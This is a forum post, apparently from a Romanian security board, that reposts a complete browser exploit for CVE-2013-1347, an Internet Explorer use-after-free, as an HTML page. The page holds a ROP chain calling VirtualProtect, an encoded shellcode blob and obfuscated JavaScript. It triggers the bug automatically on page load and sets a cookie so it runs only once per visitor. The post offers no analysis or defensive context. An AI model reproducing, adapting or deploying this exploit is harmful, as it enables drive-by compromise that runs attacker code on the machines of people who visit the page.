Jump to content
Nytro

CVE-2013-1347 - MSIE Use After Free EXP

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

MSIE Use After Free EXP/CVE-2013-1347

[URL="http://pastebin.com/JN2GiB8n#"][img=http://pastebin.com/i/t.gif][/URL]		 		
[LIST=1]    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
      <?IMPORT namespace="t" implementation="#default#time2">
    </meta>

    <script>
    pRESSURA = eval('unescape');
    fAHPARIC = CollectGarbage;
    dISCESA = '%u';
    function rIGUARDI(rEPLACEMENT) {
        return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
    }

    function vILMENTE(tRIPARTITO) {
        rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
        if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
        mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
        if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
        tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
        if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
        pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
        if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
        return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
    }
    function ue(dw) {
        return rIGUARDI(vILMENTE(dw));
    }

    function setc() {
        var Then = new Date()
        Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
        document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
    }

    function readc() {
        var cookieString = new String(document.cookie);

        if (cookieString.indexOf("fucktheothers") == -1) {
              return 0
        } else {
              return 1;
        }
    }  

    function DropPayload()
    {
          // en = 77c10000
          // kr = 77bc0000
          // offset = 50000
          var r = "";
          r+= ue( 0x77bd4cfa );  // # POP EBP # RETN [msvcrt.dll] 
          r+= ue( 0x77bd4cfa );  // # skip 4 bytes [msvcrt.dll]
          r += ue( 0x77BFFA1C);  // # POP EBX # RETN [msvcrt.dll]
          r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
          for(i=0;i<=0x201;i++) {
          r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
          }
          r+= ue( 0x77be4de1 );  // # POP EAX # RETN [msvcrt.dll] 
          r+= ue( 0x2cfe04a7 );  // # put delta into eax (-> put += 0x00000040 into edx)
          r+= ue( 0x77bfeb80 );  // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 
          r+= ue( 0x77c08fbc );  // # XCHG EAX,EDX # RETN [msvcrt.dll] 
          r+= ue( 0x77bde33f );  // # POP ECX # RETN [msvcrt.dll] 
          r+= ue( 0x77c0e062 );  // # &Writable location [msvcrt.dll]
          r+= ue( 0x77bf6116 );  // # POP EDI # RETN [msvcrt.dll] 
          r+= ue( 0x77bf7a42 );  // # RETN (ROP NOP) [msvcrt.dll]
          r+= ue( 0x77beb8ba );  // # POP ESI # RETN [msvcrt.dll] 
          r+= ue( 0x77bdaacc );  // # JMP [EAX] [msvcrt.dll]
          r+= ue( 0x77beb860 );  // # POP EAX # RETN [msvcrt.dll] 
          r+= ue( 0x77bc1120 );  // # ptr to &VirtualProtect() [IAT msvcrt.dll]
          r+= ue( 0x77d03ad9);   // # PUSHAD # RETN [user32.dll] 
          r+= ue( 0x77c01025 );  // # ptr to 'push esp # ret ' [msvcrt.dll]

          return r;
    }
    function align_esp()
    {
      var r= "";
      r += ue(0x77BFD801);
      return r;
    }
    function xchg_esp()
    {
      var r="";
      r += ue(0x77BC5ED5);
      return r;
    }
    function helloWorld()
    {
      if (readc()) return;
      setc();

      unicorn = unescape("ABCD");
      unicorn2 = unescape("EEEE");
      for (i=0; i < 2; i++) {
        unicorn += unescape("ABCD");
      }unicorn += unescape("AB");

      unicorn += DropPayload();
      unicorn +=  "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919";
      animvalues = align_esp();

      for (i=0; i < 0x70/4; i++) {
        if (i == 0x70/4-1) {
          animvalues += xchg_esp();
        }
        else {
          animvalues += align_esp();
        }
      }

      animvalues += unicorn;

      for(i = 0; i < 13; i++) {
        animvalues += ";red";
      }
      f0 = document.createElement('span');
      document.body.appendChild(f0);
      f1 = document.createElement('span');
      document.body.appendChild(f1);
      f2 = document.createElement('span');
      document.body.appendChild(f2);
      document.body.contentEditable="true";
      f2.appendChild(document.createElement('datalist'));
      f1.appendChild(document.createElement('span'));
      f1.appendChild(document.createElement('table'));
      try{
        f0.offsetParent=null;
      }catch(e) {

      }f2.innerHTML="";
      f0.appendChild(document.createElement('hr'));
      f1.innerHTML="";

      fAHPARIC();

      try {
        a = document.getElementById('myanim');
        a.values = animvalues;
      }
      catch(e) {}
    }

    </script>
    </head>
    <body onload="eval(helloWorld());">
    <t:ANIMATECOLOR id="myanim"/>

    </body>
    </html>

@PhysicalDrive0
[/LIST]

Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...